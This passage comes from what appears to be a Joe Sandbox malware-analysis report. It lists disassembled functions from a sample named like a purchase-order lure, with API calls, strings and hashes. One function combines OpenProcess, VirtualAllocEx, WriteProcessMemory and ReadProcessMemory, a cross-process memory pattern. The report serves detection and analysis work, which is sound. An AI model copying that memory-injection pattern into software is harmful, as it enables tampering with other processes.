Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction ID: 1a21917130ddbb47f9248a99b6df19eade1bd1d8620e4c39e32b257b59b9eced
Opcode Fuzzy Hash: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction Fuzzy Hash: 43515961B08221D2CB15BF15F90137B2BA49B40711FE04DBBE8C6823E9DF7C8E95965E

Function 00444606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0049DC50,?,0000000F,0000000C,00000016,0049DC50,?), ref: 00444645

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004446C5

Strings

REMOVE, xrefs: 00444676
THIS, xrefs: 00444703

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction ID: 598861723889322f2b36ecddc1b796b6f6d96aabc3fe50002778cc507f541961
Opcode Fuzzy Hash: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction Fuzzy Hash: DE419874A001199FDF00DF65C881AAEB7B5FF89308F14806EE915AB392DB38DD46CB58

Function 0043C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC08,?,?,00000034,00000800,?,00000034), ref: 00444335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0043C1D3

Part of subcall function 004442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00444300

Part of subcall function 0044422F: GetWindowThreadProcessId.USER32(?,?), ref: 0044425A
Part of subcall function 0044422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0044426A
Part of subcall function 0044422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00444280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C28D

Strings

@, xrefs: 0043C2A5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction ID: 3f4c4a65faee7a5d8857929f5e28f96f4fee7115f0a52c3415428020ef33ee1d
Opcode Fuzzy Hash: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction Fuzzy Hash: 0C413976A0021CAFDB10DFA4CD81BEEB7B8BF49704F00409AFA45B7181DA756E45CB65

Function 0046A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0049DC00,00000000,?,?,?,?), ref: 0046A6D8
GetWindowLongW.USER32 ref: 0046A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0046A705

Strings

SysTreeView32, xrefs: 0046A6AA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction ID: e35dea41237fcbc3d60db0d7b0801f268ac0ee7baed950b9ceceedc0e64d78fd
Opcode Fuzzy Hash: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction Fuzzy Hash: FD31B231601605ABDB118E34CC41BEB77A9EF49324F24472AF875A32E1D738E8609B5A

Function 00455180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004551C6

Strings

|, xrefs: 004551B5
DE, xrefs: 0045522E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$DE
API String ID: 1413715105-2586410654
Opcode ID: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction ID: 7ff0a5d39f7edaf8f80adf74e6cb1badfa182ff46140bd3db269d441b7208e6c
Opcode Fuzzy Hash: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction Fuzzy Hash: 66311871C00119ABCF01AFE5CD85AEE7FB9FF18704F00016AF815B6166DA35A916DBA4

Function 0046A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0046A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0046A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046A196

Strings

SysMonthCal32, xrefs: 0046A129

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction ID: 2be483add4762aa6c11c59ba3fc8898740279692600701ed87bb33f31a59144f
Opcode Fuzzy Hash: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction Fuzzy Hash: 8021BF32510218ABEF118F94CC42FEA3B79EF49714F100215FA557B1D0E6B9AC51CBA9

Function 0046A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0046A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0046A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0046A956

Strings

msctls_updown32, xrefs: 0046A8BB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction ID: 5f55c68ffc2c420652bad11bb8842fcf2bc24ed935bcb913f205816fc4057d67
Opcode Fuzzy Hash: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction Fuzzy Hash: 5E21B5B5600609AFDB00DF18CC81D7737ADEF5A358B15045AFA04A7361DB34EC118B66

Function 0046A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0046A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0046A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0046A48F

Strings

msctls_trackbar32, xrefs: 0046A444

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction ID: 66ff69cd09a3b487b2c32ef9eb509d7a9d7ee40f74df3f0d23145d62b3b9f1d8
Opcode Fuzzy Hash: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction Fuzzy Hash: C711E771200208BEEF209F65CC49FEB3769EF89754F014129FA45A6191E6B6E821CB29

Function 00422287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00422350,?), ref: 004222A1
GetProcAddress.KERNEL32(00000000), ref: 004222A8

Strings

combase.dll, xrefs: 0042229C
RoInitialize, xrefs: 00422290

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
Instruction ID: 6f86a244cca01810aa437f803786dff7c52cda76eae9428ae4ec3552b341fd87
Opcode Fuzzy Hash: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
Instruction Fuzzy Hash: CEE01270A91300EBDBA06F70ED8EF193B64AB00B06F604875B182E61E0CFBA8040CF1C

Function 0042235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00422276), ref: 00422376
GetProcAddress.KERNEL32(00000000), ref: 0042237D

Strings

combase.dll, xrefs: 00422371
RoUninitialize, xrefs: 00422365

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction ID: c2c24ff20b62a58202260a8ac82467be98224401b9ca7413dff3875aec422145
Opcode Fuzzy Hash: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction Fuzzy Hash: 38E09270A46304EFDB61AFA1AD0DF097B64B700706F240835F509921F0CBBA94108B1C

Function 0047AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0047AC60
__swprintf.LIBCMT ref: 0047AC94

Strings

%.3d, xrefs: 0047AC6E
WIN_XPe, xrefs: 0047ACD3

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
Instruction ID: 4bb50aad0237944cfab0efe33b29d805611698b4e44c1c58e7d0ac381245c981
Opcode Fuzzy Hash: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
Instruction Fuzzy Hash: CDE0ECB1805628AFCA1697509D05DFD737CA784741F5044D3B90AA2014D63D9BAAAB2F

Function 00462205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004621FB,?,004623EF), ref: 00462213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00462225

Strings

GetProcessId, xrefs: 0046221F
kernel32.dll, xrefs: 0046220E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction ID: 394556c6ca59c9a21163b339209c69f1bda373faab45590677b55d6d9d69d704
Opcode Fuzzy Hash: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction Fuzzy Hash: 82D05E34801B12AFC7215B31A90864677D4AF04704B10486FA841A2290E6B8D8808768

Function 004042F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,004042EC,?,004042AA,?), ref: 00404304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404310
kernel32.dll, xrefs: 004042FF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction ID: 8e2625daa83c3a9d930da8d8dbc3e06159fd1fb9ec63ca39b981bd2942dc7d0d
Opcode Fuzzy Hash: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction Fuzzy Hash: A0D0A7B0900712AFCB205F21EC0C74677D4AF44701B10483FE941E22F4D7B8C8808728

Function 0040434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004041BB,00404341,?,0040422F,?,004041BB,?,?,?,?,004039FE,?,00000001), ref: 00404359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0040436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404365
kernel32.dll, xrefs: 00404354

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction ID: 3d90eeb04a118de8df55b6892bbe8ede2cd4c825abe2ba33daa0fdaf18675234
Opcode Fuzzy Hash: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction Fuzzy Hash: C9D0A7B0900712AFC7305F35E80CB4677D4AF10715B10483FE881E22D0D7B8D8808728

Function 00440564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0044052F,?,004406D7), ref: 00440572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00440584

Strings

oleaut32.dll, xrefs: 0044056D
UnRegisterTypeLibForUser, xrefs: 0044057E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction ID: b5979cb841ee170266d89ba9e623a11cea52974f8194418e85b48c4c5a062689
Opcode Fuzzy Hash: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction Fuzzy Hash: 43D05E31800712AAD7209F20A80CB5677E4AF04700B20892FE94192294D6B8C4908B28

Function 00440539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0044051D,?,004405FE), ref: 00440547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00440559

Strings

RegisterTypeLibForUser, xrefs: 00440553
oleaut32.dll, xrefs: 00440542

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
